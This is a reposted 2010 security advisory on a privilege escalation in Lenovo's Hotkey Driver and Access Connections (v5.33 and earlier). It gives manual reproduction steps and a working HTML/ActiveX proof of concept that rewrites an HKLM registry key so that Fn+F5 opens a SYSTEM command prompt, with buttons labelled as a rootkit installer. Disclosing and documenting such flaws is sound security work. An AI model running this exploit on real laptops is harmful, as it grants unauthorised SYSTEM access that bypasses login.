首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Lenovo Hotkey Driver / Access Connections <= v5.33 Privilege Escalation
来源:http://invalid-packet.blogspot.com/2010/03/full-di 作者:Chilik 发布时间:2010-03-09  
=======================================================================
Lenovo Hotkey Driver / Access Connections <= v5.33 Privilege Escalation
=======================================================================

Author: Chilik Tamir - Amdocs Power Security Testing Group
Website: http://invalid-packet.blogspot.com/2010/03/full-disclosure-security-vulnerability.html
Subject: Security vulnerability <Privilege escalation> in Lenovo  Hotkey  Driver and Access Connections  version <=v5.33
Impact:
A privilege escalation attack can be used as a backdoor to bypass login and run arbitrary code as a System user on Lenovo  or Thinkpad  laptops running Access Connection  v5.33 and earlier versions (tracked back to version 4)


Technical details:
The Hotkey  Driver is an Lenovo  application that monitors the Lenovo  special Hotkeys (Fn keys) and execute Lenovo  specified applications upon their invocation.
The default installation of the Hotkey  Driver is as a service and runs under NT Authority\System privileges.
Upon hot key detection, the Hotkey  driver checks the registry key for the specified file to lunch and evokes that file, as example When the Fn + F5 key combination is pressed the Hotkey  driver checks the registry key named File at HKEY_LOCAL_MACHINE\SOFTWARE\IBM\TPHOTKEY\CLASS\01\05 for its value and then launches the specified application (by default, Tp/AcFnF5.exe).
The Hotkey  driver is available even prior to Windows login due to its installation configuration.
The value of the registry key to be lunched is not verified at invocation time.
This key is not monitored by the operating system and any change to this key is undetected.
An attacker with restricted access to the registry can use this information to launch a targeted attack on Lenovo  or Thinkpad  users that changes this key into an arbitrary application that runs with System permission.
Reproduce:

Using the target laptop change the File registry key value at HKEY_LOCAL_MACHINE\SOFTWARE\IBM\TPHOTKEY\CLASS\01\05 from 'Tp/AcFnF5.exe' to 'cmd.exe'.
Lock the station ('Windows' + 'L').
Press 'Fn'+'F5' and a windows command prompt opens with System privilege.

Mitigation:
Please update Hotkey  Driver and Access connection  to the most updated version (link here) at Lenovo  website

Exploit example:
This html exploit code uses ActiveX to hijack the Access connection hot key. (Please run on a Virtualized environment).
-----------code starts here----------
<head>
<script language="javaScript" type="text/javascript">
myobject = new ActiveXObject("WScript.Shell")
function install()
{
uri="HKEY_LOCAL_MACHINE\\SOFTWARE\\IBM\\TPHOTKEY\\CLASS\\01\\05";
tag="\\"
var value="File";
var data="cmd.exe";
myobject.run("reg.exe"+" copy "+uri+" "+uri+"\\backup "+" /f ");
myobject.run("reg.exe"+" ADD "+uri+" /v "+value+" /d "+data+" /f ");
value="Parameters";
data="/T:74";
myobject.run("reg.exe"+" ADD "+uri+" /v "+value+" /d "+data+" /f ");
}
function remove()
{
uri="HKEY_LOCAL_MACHINE\\SOFTWARE\\IBM\\TPHOTKEY\\CLASS\\01\\05";
myobject.run("reg.exe"+" copy "+uri+"\\backup "+uri+" /f ");


}
</script>

</head><body>
<h1>Lenovo Access Connection Exploite POC<h1>
<button onclick="install()">Install RootKit</button><P><button onclick="remove()">Remove RootKit</button>
</body></html>
---------code ends here------------

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Spamassassin Milter Plugin Rem
·TopDownloads MP3 Player 1.0 m3
·Netscape Navigator - Namoroka
·Apache 2.2.14 mod_isapi Dangli
·Linux Kernel 64bit Personality
·JITed stage-0 shellcode
·FreeBSD and OpenBSD 'ftpd' NUL
·Yahoo Player v1.0 (.m3u/.pls/.
·QuickZip 4.x (.zip) 0day Local
·Flare <= 0.6 Local Heap Overfl
·QuickZip 4.x (.zip) Buffer Ove
·ONECMS v2.5 SQL Injection Vuln
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved